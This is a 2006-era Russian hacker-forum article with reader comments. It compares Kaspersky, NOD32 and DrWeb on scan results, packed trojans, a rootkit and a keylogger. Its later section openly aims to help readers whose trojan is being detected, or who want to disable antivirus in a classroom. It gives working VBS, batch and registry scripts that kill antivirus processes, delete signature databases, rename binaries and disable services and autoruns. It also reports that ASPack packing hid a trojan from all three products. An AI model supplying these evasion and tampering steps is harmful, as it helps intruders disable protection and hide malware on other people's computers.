Intro Каждый из нас сталкивался с выбором "Какой же антивирус мне установить?" И следующий вопрос был "А какой лучше?". В интернете можно достаточно легко найти тесты и истории сравнения антивирусов. Однако зачастую, это либо галочка "Зачёт/Незачет", либо сухое "Нашел 7 вирей из 10". Несколько полезных ссылок на ресурсы приведены в конце статьи. Кроме того, самые смачные глюки находят обычно пользователи... тоесть мы с вами. Фанаты до хрипа доказывают друг другу преимущества любимого продукта, приводя мыслимые и немыслемые доводы. Не будем им мешать. А тиха сядем, скачаем и протестируем сами. Чо мы, лузеры? =] _______________________________________________________________________ Чёрт знает, что тварИться!!... 1. Технологии. 2. Испытуемые. 3. Обещания разработчиков. 4. Если приглядеться. 5. Сканируем файлы. 6. Проверяем почту. 7. Ловим на живца. - Это не слон - это конь! - Rootkit - играем в прятки. - SpyWare - подглядим. 8. Умри, несчастный! 9. Вскрытие показало. №_1_+++++++++++++..:: Технологии ::.. +++++++++++++ Технологии обнаружения и борьбы с вирусами. 1. Основной метод поиска вирусов состоит в использовании сигнатур(характерных фрагментов кода) вирусов, т.е. так называемые "антивирусные базы". Цепочка попонения антивирусных баз такова: "обнаружение вредоносного кода пользователем\разработчиком антивируса" - > "отправка на проверку" -> "анализ" -> "включение сигнатур в базы" -> "обновление баз". Слишком долго, не правда ли? Цепочка длинная и слабым звеном в ней является первоначальное обнаружение вируса. Однако, теперь этой задачей занимается эвристик. Перспективные направления методов детектирования вирусов: 1. Эвристический анализатор. Эвристика (от греч. - отыскиваю, открываю) - это наука, изучающая продуктивное творческое мышление и использующая спец. методы с целью открытия нового. Спомощью эвристики можно распознать вируную программу по типу выполняемых действий, путем глубокого и "интелектуального" анализа кода. Эвристик не даёт 100% защиты и его работа сводиться к балансу между приемлемым уровнем защиты и числом ложных срабатываний. Эвристика на основе сигнатур: в базу эвристика заносятся сигнатуры характерных фрагментов кода вирусов и троянских программ. Самая распространённая методика. 2. Эмулятор. Эмулируя выполнение программы, можно проследить, какие действия она будет пытаться выполнить. Существует онлайн проверка http://virusscan.jotti.org. Полноценное изучение программы на виртуальном ПК. Вы можете отослать подозрительный файл на проверку и посмотреть результаты. Эмуляция позволяет распознать полиморфные(т.е. самошифрующиеся вирусы), используя способ редуцированной маски. 3. Поведенческие анализаторы и блокираторы. Анализируют действие запущенной программы, следит за их последовательностью. 4. SpayWare методика. Основана на поиске характерных файлов, ключей реестра и др. ---- iChecker и iStreams("Антивирус наоборот"). Создается база данных сигнатур проверенных файлов и в дальнейшем отслеживаются лишь их изменения и создание новых файлов (снимаются подозрения с уже проверенных файлов). Это возможно благодаря использованию базы контрольных сумм объектов и хранение контрольных сумм файлов в дополнительных потоках NTFS. 5. iChecker™ - технология, позволяющая увеличить скорость антивирусной проверки за счет исключения тех объектов, которые не были изменены с момента предыдущей проверки, при условии, что параметры проверки (антивирусные базы и настройки) не были изменены. Информация об этом хранится в специальной базе. Технология iChecker™ имеет ограничение: она применима только к объектам с известной Антивирусу структурой (например, файлы exe, dll, lnk, ttf, inf, sys, com, chm, zip, rar). 6. iStreams™ - технология, аналогичная iChecker™. Отличие технологий состоит в том, что в iStreams™ информация о проверке объекта хранится в дополнительном потоке файла. Кроме того, технология iStreams™ применима к объектам любого типа, независимо от того, известна или нет Антивирусу Касперского структура данного объекта. 7. iCure и iArc - технологии проверки архивов с многотомным вложением. Большинство антивирусов не способны проверять архивы, тем более, если он многотомный. Это позволяет скрыть вирус. Но с использованием данных технологий вирус будет обнаружен(если архив без пароля). частично: источник ][aker-spec_08_2005 №_2_+++++++++++++..:: Испытуемые ::.. +++++++++++++ На операционном.. тьфу, рабочем столе: 1. Microsoft Windows XP Professional 5.1.2600 Service Pack 2 сборка 2600 число установленных исправлений - 117 ( гы! у кого больше? =] ) 2. Антивирусы распространённые: - Kaspersky_Anti-Virus_Personal_Pro_v388 (base from 2006-02-05) - NOD32_2.50.25 Версия вирусной базы данных: 1.1381 (20060126) Датирована: четверг, 26 января 2006 г. Сборка вирусной базы данных: 6669 - DrWeb_4.33 Последнее обновление вирусных баз: 2006-02-07 15:01:53 MSK Всего записей в вирусной базе: 102261 3. T 4. Вирусы разные. БАААААльшая куча. - 120 мб разных червей и вирей вперемешку (выбирай себе любой =] ) - Trojan - Spy_&_KeyLoger - Rootkit - Exploit - HackTools 5. Хинч_1.5_alfa3 собственной персоной. 6. Руткит AFXRootkit2005 7. Кейлогер Nestor 9х/NT/2000/XP Version 2.0 8. Холодильник - пустой, совесть - деинсталированная =] №_3_+++++++++++++..:: Обещания разработчиков ::.. +++++++++++++ Приведем-с описание важных модулей, заявленных разработчиками в мануале. Пропустим второстепенные модули, ИМХО мы тут не цвет кнопочек разглядываем. Итак, они мамой клянуться, что: =======Общее - Постоянная защита - Проверка по требованию - Проверка и лечение входящей/исходящей почты - Обновление антивирусных баз - Защита паролем - Управление профилями работы - Отправка объектов на экспертизу - Логи, карантин, планировщик - Проверка архивов. - Internet monitor for POP3 / HTTP =======Индивидуальное =======Kaspersky_Anti-Virus_Personal_Pro_v388 - Защита от сетевых атак - Очень Частое Регулярное обновление антивирусных баз, программных модулей (включающая ВСЕ когда-либо найденные типы вирусов, эксплоитов) - Защита от макросов и скриптов - Обновление баз сетевых атак и программных модулей - IChecker™ и iStreams™ - Лечение зараженных архивов(zip, arj, cab, rar), проверка вложенных архивов. =======NOD32_2.50.25 - Защита от макросов и скриптов - Обновление программных модулей =======DrWeb_4.33 - Консольный сканер под винды. - Сканер под дос. №_4_+++++++++++++..:: Если приглядеться ::.. +++++++++++++ Здесь я приведу достоинства/недостатки/заметки, которые подметил лично я, либо другие пользователи. =======AVP или просто Дядя Каспер :-] . За что же мы его так любим? Достоинства: 1. Простота настроек. 2. Рускоязычный, дружелюбный к пользователю интерфейс. 3. Хорошая защита собственного процеса. 4. Защита настроек паролем. Недостатки: 1. Фирменные ТОРМОЗА дяди Каспера ))). Но это смотря где и как настроить. 2. Отсутвие проверки сетевых дисков (в данной версии). 3. Недостаточная защита ключей настроек в реестре и баз от удаления. 4. Убивает зараженный файл, хотя мог бы и вылечить. 5. Нет поддержки Win2003 (в данной версии), скорее всего, и WinVista_Longhorn. =======NOD32 - скорость и функциональность Достоинства: 1. Хорошая эвристика. 2. Не тормозит на полных настройках. 3. Приемлемо лечит зараженные файлы. 4. Поддержка проверки файлов по сети. 5. Поддержка Win2003. 6. Английский, но есть русик. Недостатки: 1. Ложное срабатывание. 2. Не всегда верно определяет версию вируса. 3. Недостаточная защита собственного процесса и сервиса. 4. При отключении AMON - отказывался включать без перезагрузки системы. 5. Не чистит архивы. =======DrWEB - о, любезный доктор... Достоинства: 1. Лучший эмулятор из существующих! 2. Великолепно лечит зараженные файлы, доктор ведь :-] . 3. Поддержка всех известных упаковщиков. 4. Русский и простой интерфейс. Недостатки: 1. Ошибки с обновлением баз, зачастую недаёт обновить новую базу без обновлении версии самой программы. 2. При использовании апача некотоые скрипты глючат. 3. Процесс антивируса, его служба и ключи реестра АБСОЛЮТНО беззащитны. 4. Нет защиты настроек паролем. 5. Не поддерживает Win2003. 6. Не чистит архивы. 7. Тормоза есть, однако. №_5_+++++++++++++..:: Сканируем файлы ::.. +++++++++++++ ВсЁ!!! Хватит нудной теории, скучных манов и наставительных советов! Покажите себя в реальном деле! Вот вам вири. АТУ, их! АТУ! Так, поочередно врубаем каждый сканер. Ставим МАКСИМАЛЬНЫЕ режимы. Вобщем то, это будет пасивное сканирование, так вири я не запускал. Поясню, что зачастую, будучи запущенным, вирус может быть определён; тогда как в незапущенном состоянии он может абсолютно не палится. На растерзание обозлившимся сканерам будут отданы семь типов ПО. А именно: 1)Шутки - безвредные приколы над юзером 2)Гады =] - вредные вири(формат, тормоза, сжигание железа) 3)Trojan - воровство паролей, удаленное администрирование 4)Spy_&_KeyLoger - шпионы всех мастей 5)Rootkit - проги, скрывающие в системе процесы\записи в реестре 6)Exploit - эксплоиты 7)HackTools - самые нужные программы на вашем винте =] Расшифровать так: 34=5678=01:45 нашёл 34 виря из 5678 проверяемых за 1 минуту 45 сек =======AVP /me ...обычно, вам низя лезть в эти папки, но сЁдня всё можно ))). 1)Шутки - 21=796=00:40 2)Гады - 238=583=00:13 3)Trojan - 139=2661=01:00 4)Spy_&_KeyLoger - 15=536=00:22 5)Rootkit - 36=2240=00:48 6)Exploit - 51=4785=02:12 7)HackTools - 81=56378=00:18:10 =======NOD32 1)Шутки - 7=736=00:42 2)Гады - 227=469=00:06 3)Trojan - 136=2846=02:29 4)Spy_&_KeyLoger - 23=550=00:14 5)Rootkit - 23=2227=00:28 6)Exploit - 33=4680=01:24 7)HackTools - 75=85795=00:26:10 =======DrWEB 1)Шутки - 20=917=00:40 2)Гады - 236=517=00:20 3)Trojan - 149=3280=01:45 4)Spy_&_KeyLoger - 30=836=00:33 5)Rootkit - 16=2221=00:53 6)Exploit - 47=6289=03:07 7)HackTools - 235=91831=01:19:00 Так-так, АВП у нас середнячок - и по скорости и кол-ву. Эксплоитов больше всех. Однако, со шпионами он не так хорошо знаком, как остальные. Нод самый шустрый. С "шутками" он не знаком, но это простительно. Доктор думает дольше всех. Но не вовсе не зря. Настораживает незнание руткитов. Хм.. Хак-тулзы и эксплоиты знает в лицо ))) №_6_+++++++++++++..:: Проверяем почту ::.. +++++++++++++ Не хотел ставить The Bat, но пришлось. Предварительно закинул на свой ящик три письма. В каждом по Email-Worm.Win32.Nyxem.exe. В первом - вирь как есть. Во втором - в RAR архиве. В третьем - RAR архив с тройным вложением. Кадый антивирус нашел при сканированиии все вирусы. Ну к чести антивирей зараза в почте была распознана. Так даже не интересно. №_7_+++++++++++++..:: Ловим на живца ::.. +++++++++++++ А теперь приступим к учениям, приближенным к боевым. Ударим по самым уязвимым местам антивирусов. И на этот раз вири будут нападать, а не лежать мясом в бойне. Причем, я предварительно убрал те, что палились. Теперь всё по честному, все на равных. =======Это не слон - это конь! Возьмём популярного ксинча, скомпилим несколько различных его комбинаций: 1) Xinch_pass_.exe - тащит пароли, SMTP 2) Xinch_backdoor.exe - просто бэкдор 3) Xinch_irc_.exe - ирк-бот 4) Xinch_service.exe - убийство процессов для последующей атаки 5) Xinch_proxy.exe - прокси-сервер 6) Xinch_site.exe - накрутчик сайтов 7) Xinch_ftp_.exe - фтп-сервак Просканим, их. ******AVP****** MEW-паковщик - среагировал только на пароли Xinch_pass_ UPX-паковщик - вирусов не найдено!!! ****NOD32**** MEW-паковщик - опознал всех, кроме Xinch_proxy и Xinch_site UPX-паковщик - опознал всех, кроме Xinch_service.exe ****DrWEB**** MEW-паковщик - опознал всех!!! UPX-паковщик - опознал всех!!! Лана, делаем прокси+бэкдор без сжатия, пакуем ASPack_2.12. Йййй-е-е-с!!! Никто не палит!!! Запустим... Каждый антивирь молчит!!! =======Rootkit - играем в прятки Большинство антивирусов не умеют бороться с руткитами. Как известно руткит-технология позволяет изменить работу ядра системы по усмотрению хакера, в результате чего достаточно легко можно "спрятать" файлы, ключи реестра, открытые порты и прочие проявления работы вредоносной программы от антивируса и утилит пользователя. Обнаружить и удалить руткит досаточно трудно, нейтрализовать на рабочей системе - ещё сложнее. Берём AFXRootkit2005. Определяеться всеми антивирями. Мне было влом его распаковывать и вновь упаковывать. Предположим, что антивирь временно отключён. Активируем руткит. Скрываемая папка пропадает, процесс не видно в диспетчере задач. Включаем поочередно антивирусы... ******AVP****** Мониторинг находит руткит, если вызвать диспетчер задач и легко находит его на винте при скане дисков. ****NOD32**** Аналогично. ****DrWEB**** У Доктора есть класный глюк!!! Сканер НЕ НАХОДИТ руткита на диске, НО ещё многое зависит от сканирования оперативы при старте сканера. (если диспетчер задач при старте не открыт - руткит не будет обнаружен) Не сомневаюсь, есть более продвинутые руткиты, которые не видны. =======SpyWare - подглядим Шпионы зачастую остаються незамечены антивирями Я выбрал стелс-кейлогер nestor-2.0. Он не определяеться КАВом и НОДом. Доктор его знает, и потому для него мы намеренно запустим шпиона из папки с руткитом из предыдущего теста)) Хыхыхы =] Все антивири дружно облажались.
№_8_+++++++++++++..:: Умри, несчастный! ::.. +++++++++++++ УУу-Ха-ха!! Ща разомнемся. Так, скомпилял ты трояна, но его палит антивирь? Или ты хочешь вырубить антивиря в компьтерном класе? Щас рассмотрим, как это моно сбацать. Самые главные условия для таких действий - это админские или системные права. Как это сделать - думай сам (разводи админа; ищи эксплоит). Как оказалось, каждый из этих антивирусов уж слишком доверяет пользователю. Предположим самый простой случай - антивирь без пароля. Заставим выгружаться без нашей помощи (троян, IE, Opera). Процесс авто-выгрузки инициализируется , к примеру, скриптом на Бейсике(или Джаве). Сохрани эти строчки в текстовый файл и измени расширение на *.vbs Бэйсик я не знаю, для полного счастья нехватает ещё мышиных операций. Вот такой скриптик непринужденно отключит Ognitum Autpost: Code: set WShell = CreateObject("WScript.Shell") WShell.Exec "C:\Program Files\Agnitum\Outpost Firewall\outpost.exe" WScript.Sleep 200 WShell.AppActivate "Agnitum", TRUE WScript.Sleep 100 WShell.SendKeys "{F10}{DOWN}{UP}{ENTER}" WScript.Sleep 100 WShell.SendKeys "{ENTER}" источник vbs-скрипта http://www.securitylab.ru/analytics/216375.php Теперь обходим пароль. =======AVP Самый страшный враг АВП - он сам. Для того, чтобы гигант антивирусной идустрии новил вирей - слишком уж много условий ему надо. И в наших силах ему помешать!!! После перезапуска\перезагрузки АВП устроит забастовку, если: 1) Найти и удалить ключ лицензии ( *.key ). Делов-то. 2) Попытаться удалить базы антивиря. Благо, они в гостевой папке!!! Code: del /f /q "C:\Documents and Settings\All Users\Application Data\Kaspersky Anti-Virus Personal Pro\5.0\Bases" Загрука в АВП двойная - реестр+служба. Если просто выгрузить, служба останется активной и будет килять всё, что её не понравиться АВТОМАТОМ. Без всяких "Вы уверены?". РРРАЗ! И нету твоего трояна. Идём через реестр. Вот так запускается *.reg из консоли: Code: reg import 111.reg Отключаем службу в реестре(измените на эти строки): Пихаем следуюий код в *.reg файл: Code: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\kavsvc] "Start"=dword:00000004 [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\kavsvc] "Start"=dword:00000004 [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\kavsvc] "Start"=dword:00000004 Отключаем шел-оболочку в реестре(испортить, удалить эту запись): Code: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "KAVPersonal50"="\"C:\\Program Files\\Kaspersky Lab\\Kaspersky Anti-Virus Personal Pro\\kav.exe\" /minimize" Усё. После ребута - вы кАроль )) Между прочим, если расковырять редактором длл-ки, можно заменить иконку в трее на вечно красную.... А постоянную защиту вырубить. Очень эФФектно смотриться - типа усё ок'ей, а антивирь на самом деле бамбук курит. До рядового юзверя месяцами доходит, пока реальную заразу не зацепит где-нить. ....и против переименования своих файлов он тоже не возражает. А глючит потом сильно) Зато профиль с настройками, пока не выгрузишь, не заменишь. Но эт нас не Астановит. Профиль лежит тут "C:\Documents and Settings\All Users\Application Data\Kaspersky Anti-Virus Personal Pro\5.0\Policy" =======NOD32 Нод обычно крячится, трюк с лиц.ключом здесь не применишь. Базы здеся "C:\Program Files\ESET\updfiles" Защита процесса в ноде хилая. Загрука опять двойная - реестр+служба. Процесс и оболочку мы уже можем вырубить taskkill'ом . Защита одна и простая, как две копейки. Сервис, умирая, перезапускает себя =] Переименуем nod32krn.exe в мусор и снова киляем... Красота ))) Даже перегруз не нужен. Вот скрипт в *.bat Code: rename "C:\Program Files\ESET\nod32krn.exe" fucker.exe rename "C:\Program Files\ESET\nod32kui.exe" fuck.exe taskkill /IM nod32krn.exe /F /T taskkill /IM nod32kui.exe /F /T Отключаем службу в реестре(измените на эти строки): Code: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\NOD32krn] "Start"=dword:00000004 [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\NOD32krn] "Start"=dword:00000004 [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\NOD32krn] "Start"=dword:00000004 Отключаем шел-оболочку в реестре(испортить, удалить эту запись): Code: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "nod32kui"="\"C:\\Program Files\\Eset\\nod32kui.exe\" /WAITSERVICE" =======DrWEB Базы лежат прямо в папке вместе с антивирём "C:\Program Files\DrWeb" Лицензионный ключ - ТАМ ЖЕ. Я долго искал, как задать пароль на настройки. Такой функции нет. Уряяя!!! Сервис и шел оболочка не защищены никак. Di! Code: taskkill /IM spidernt.exe /F /T taskkill /IM spiderml.exe /F /T taskkill /IM drwebscd.exe /F /T Отключаем службу в реестре(измените на эти строки): Code: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\spidernt] "Start"=dword:00000004 [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\spidernt] "Start"=dword:00000004 [HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\spidernt] "Start"=dword:00000004 Больше в реестре никто не живёт: Code: Windows Registry Editor Version 5.00 [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run] "DrWebScheduler"="C:\\Program Files\\DrWeb\\DRWEBSCD.EXE" "SpIDerMail"="\"C:\\Program Files\\DrWeb\\spiderml.exe\"" "SpIDerNT"="C:\\PROGRA~1\\DrWeb\\spidernt.exe /agent" №_9_+++++++++++++..:: Вскрытие показало ::.. +++++++++++++ =======AVP Разработчики позаботились о безопасности лучше, чем в остальных антивирусах. Уникальных технологий в нём реализовано заметно больше. Скорость проверки вполне приемлима, антивирусная база одна из лучших. Однако эвристика и эмулятор не самые лучшие. Любит удалять файлы, вместо лечения. =======NOD32 Средняя защищённость. Большая функциональность и оригинальное модульное исполнение. Скорость проверки - самая высокая. Однако вирусов знает меньше всех. Тем не менее эвристик и эмулятор позволяют ему очень уверенно определять заразу. Сносно лечит файлы, умеет сканить сетевые диски. К типу винды не придераеться. =======DrWEB Защищён хуже всех. При этом находит больше всех вирусов. Низкий показатель скорости работы несколько портит впечатление. Доктор есть доктор - лечит заражённые файлы превосходно, в чём я не раз убеждался, востанавливая инсталяторы с защитой по контрольной сумме. Поддержка консольного и досового сканера пожалуй уникальна. Не раз лечил винты нерадивым пользователям из командной строки. ....каждый выбирает антивирус по потребности. зачем тогда спорить? =] Полезные ссылки: 1) http://www.webplanet.ru/news/security/2005/8/26/euristic.html 2) http://www.izcity.com/data/security/index3.htm 3) http://www.disser.ru/library/12/347.htm 4) http://www.ampula.ru/rus/personal.php
Elekt ты никогда не думал книгу написать? Уверен у тебя бы получилось на ура) а теперь большими буквами. РЕСПЕКТ. уже в который раз говорю, и в который раз заслужено ЗЫ: актуально и без зауми, как раз то что надо.
Я когда читаю данные статьи, всегда со стула падаю =). Респект - это мало!. СуперРеспект - и то, для данной статьи этого маловато.. Нету слов вообщем..., АднИ ИмОцИИ =).
Мда.... Elekt У тебя крышка не поехала столько писать? Я даже не успеваю всё прочитать, но как приеду с учёбы обязательно прочту, а так кул! )
Старо как мир,второй пост неасилил,напрягает вот такая строчка: "изменить работу ядра" жестач) Мальчик,ты в каком году живешь? Хоть бы копирайты вставил)) Баянная вещь скопипастена с секлаба.Умные люди давно вырубили поддержку виндувс скриптов.
По поводу руткитов - я бы не сказал, что это неверная фраза. В примере указан именно ядерный руткит.. А ссылочку можно? =) Мдя.. Ну я походу никогда не отличался блеском ума =).
Elekt - Зажог Танспол.... Читав эту статейку не пропустил ни строчки... Читая всё становилать интереснее и интереснее.. За это тебе огромное спасибо
- Я бы еще добавил в критерии оценок 1. Корректное лечение вирусов.(антивирус может восстановить файлы неправильно, в результате чего часть или все программы перестанут работать, и вреда от такого лечения будет намного больше, чем от самого вируса) 2. Оперативность реакции вирусных аналитиков на присланные подозрительные файлы. 3. Стабильность работы и отсутствие конфликтов с другими программами. 4. Загрузка системы( не стоит забывать, что обычно антивирус, дающий наибольшую защиту, тормозит сильнее, а антивирус, который не тормозит, скорее всего даёт менее надёжную защиту) - - Но вообще молодец, интересно написал -
qBiN прав насчёт копи-паста vbs-скрипта(кстати в оригинале он не работал, пришлось переделывать), однако, что интересно, несмотря на эффективность метода, знают о нём на все. Меня удивило то, что несмотря на частый копи-паст статей - именно её почти никто не заметил(нашёл ещё летом на секлабе и был страшно рад, так более нигде не видел столь простого и эфективного способа). Ещё честно признаюсь, что технологии антивирей частично взяты с августовского Хакера. Впринципе, ничего особо нового я не открыл, а всего лишь систематизировал использование стандартных методов. Просто и о них знают не все. Пожалуй, это одна из самых распространённых проблем - рассказать миру новость часто жалко - дыру закроют, а писать о использовании уже готового - вроде как умного из себя корчить. Ну, будем считать, я пишу об известном, только очень подробно и одержимо =]
qBiN не надо придираться енто не такое уж и большое дело написать 5 строчек вб скрипта тем более такого там такого ничео нету чтоб ктото его выдумал и копирайты поставил.. Элект ну молоток
баян "02 ноября, 2004" неужеле ты думаешь что эт никто не знал)) Хотя по возгласам так оно и есть ) Вот только если я не ошибаюсь с Аутпостом 3 версии это уже не катит(Или ошибаюсь ) )... Кто ж сказал что я придираюсь,это просто критика,свойственная всем и вся(и гениев тож критикуют) http://www.securitylab.ru/analytics/216375.php Насколько я помню это делфифский юзермоде руткит. А та фраза в корне неправельна.ИМХО.Объяснять одному тебе лень.Ибо надо думать.
Эта совместная ЗАРАЗОвская и оффтопиковкая статья - прогремела уже этак года назад. Учи матчасть! А Гугля рулит!. И ты не прав =). Объяснить или сам дотукаешься =)? =) (Прости за жаргон) )
Три года назад выпущенная..., только qBIN - приведи мне из этой статьи копи-паст этой статьи...., я помниЦЦа очень внимательн отнесся к той статье ЗАРАЗЫ.., но ту знаешь - копи паста тут соовсем не нашёл.. Даже у автора интресовался в некоторых моментах той статьи, которую ту привел с секлаба.., гно вот копи-паста не вижу хоть убей.. Покажи, если не трудно..
Разуй глаза. Скрипт видишь? а что автор пишет позже Вывод:слейдер учись читать темы...Перечитай мой пост... В следущий раз показывать тебе будет трудно. Защел на руткит.ком вроде не написано что эт ядерный руткит...Исходники качать не буду ибо лень. Если быть точным то два года тому назад,точную дату опять ты "не увидел" перечитай мои посты. Настчет той фразы тоже могу пояснить но ме должен кодить,времени нет,если не имется поговорим в асе...
Да, я согласен. Даже люблю критику. Помогает увидеть ошибки. Ради интереса просмотрел последние посты qBiN'а, и не нашел особых похвал в чей-либо адрес )) Модератор наверное и должен критиковать. Предположу, что qBiN человек серьёзный и знающий, и мои восторженные рассказы ему давно известны. Так что критику qBiN'а почту за честь. Сам стремлюсь к опыту, но думаю неплохо было бы оставить всем данные знания. Я мог потратить время на другое, но меня всегда бесили потерянные знания. Я конечно, не мальчик, но молодой - это точно ) Взрослеем-с потихоньку... Кстати, растянуть обсуждение пяти строчек на кучу постов... и это я-то Баян? )))
http://ru.wikipedia.org/wiki/Язык_падонков Советую прочитать. Эхх было бы за что хвалить ) А вопще я добрый(иногда,вренее местами,маленькими кусочками....) =) Чет расфлудились,юсё закругляюсь...
